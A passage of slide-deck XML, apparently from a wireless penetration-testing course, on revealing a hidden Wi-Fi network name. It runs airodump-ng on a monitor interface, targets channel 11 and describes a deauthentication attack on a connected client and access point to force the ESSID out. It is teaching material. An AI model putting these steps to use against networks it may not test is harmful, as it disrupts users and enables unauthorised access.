                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>Wireless Enumeration</a:t>
            </a:r>
            <a:endParaRPr sz="4000" b="1">
              <a:solidFill>
                <a:srgbClr val="353535"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1885" name="Google Shape;1885;p273"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="100025" y="821200"/>
            <a:ext cx="8520600" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-349250" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3D3D3D"/>
              </a:buClr>
              <a:buSzPts val="1900"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>If you reconfirm with ifconfig, you will see that there is now a monitoring or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900" b="1">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>wlan0mon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> address in use. Now, use airodump to confirm the available wireless networks, as given in the following command:</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="3D3D3D"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="279400" lvl="0" indent="-349250" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3D3D3D"/>
              </a:buClr>
              <a:buSzPts val="1900"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900" b="1" i="1">
                <a:highlight>
                  <a:srgbClr val="F3F3F3"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Command:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900" i="1">
                <a:highlight>
                  <a:srgbClr val="F3F3F3"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> airodump-ng wlan0mon</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="3D3D3D"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3D3D3D"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="3D3D3D"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3D3D3D"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1886" name="Google Shape;1886;p273"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2137825"/>
            <a:ext cx="8652374" cy="2635250"/>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274"/>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spcBef>
                <a:spcPts val="210"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3300">
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>Wireless Enumeration</a:t>
            </a:r>
            <a:endParaRPr sz="4000" b="1">
              <a:solidFill>
                <a:srgbClr val="353535"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1892" name="Google Shape;1892;p274"/>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914400" lvl="0" indent="-368300" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2200"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>As you can see, the third network’s ESSID is identified only as &lt;length: 0&gt;. No other name or designation is used. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="3D3D3D"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-368300" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2200"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The length of the hidden ESSID is identified as being composed of some characters; however, this value may not be correct because the ESSID is hidden. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="3D3D3D"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-368300" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2200"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The true ESSID length may actually be shorter or longer than 10 characters.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="3D3D3D"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>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75"/>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spcBef>
                <a:spcPts val="210"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3300">
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>Wireless Enumeration</a:t>
            </a:r>
            <a:endParaRPr sz="4000" b="1">
              <a:solidFill>
                <a:srgbClr val="353535"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1898" name="Google Shape;1898;p275"/>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914400" lvl="0" indent="-355600" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>What is important is that there may be clients attached to this particular network. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="3D3D3D"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-355600" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>If clients are present, we will deauthenticate the client, forcing them to send the ESSID when they reconnect to the access point.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="3D3D3D"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-355600" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Rerun airodump, and filter out everything but the target access point. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="3D3D3D"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-355600" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>In this particular case, we will focus on collecting data from the hidden network on channel 11 using the following command: “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>airodump-ng -c 11 wlan0mon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="3D3D3D"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>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27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marR="236855" lvl="0" indent="0" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="210"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3300">
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>Wireless Enumeration</a:t>
            </a:r>
            <a:endParaRPr sz="4000" b="1">
              <a:solidFill>
                <a:srgbClr val="353535"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1904" name="Google Shape;1904;p276"/>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914400" lvl="0" indent="-342900" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Executing the command removes the output from the multiple wireless sources, and allows the attacker to focus on the target ESSID.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3D3D3D"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-342900" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The data that we get when the airodump command is executed indicates that there is one station (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>40:F0:2F:DC:7A:59</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>) connected to the BSSID (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>84:10:0D:9E:A1:CD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>) which is in turn associated with the hidden ESSID.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3D3D3D"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-342900" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>To capture the ESSID as it is being transmitted, we have to create a condition where we know it will be sent—during the initial stage of the connection between a client and the access point.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3D3D3D"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-342900" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Therefore, we will launch a deauthentication attack against both the client and the access point by sending a stream of packets that breaks the connection between them and forces them to reauthenticate.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3D3D3D"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>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27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fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Gaining Access</a:t>
            </a:r>
            <a:endParaRPr sz="4000" b="1">
              <a:solidFill>
                <a:srgbClr val="353535"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1910" name="Google Shape;1910;p277"/>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1371600" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
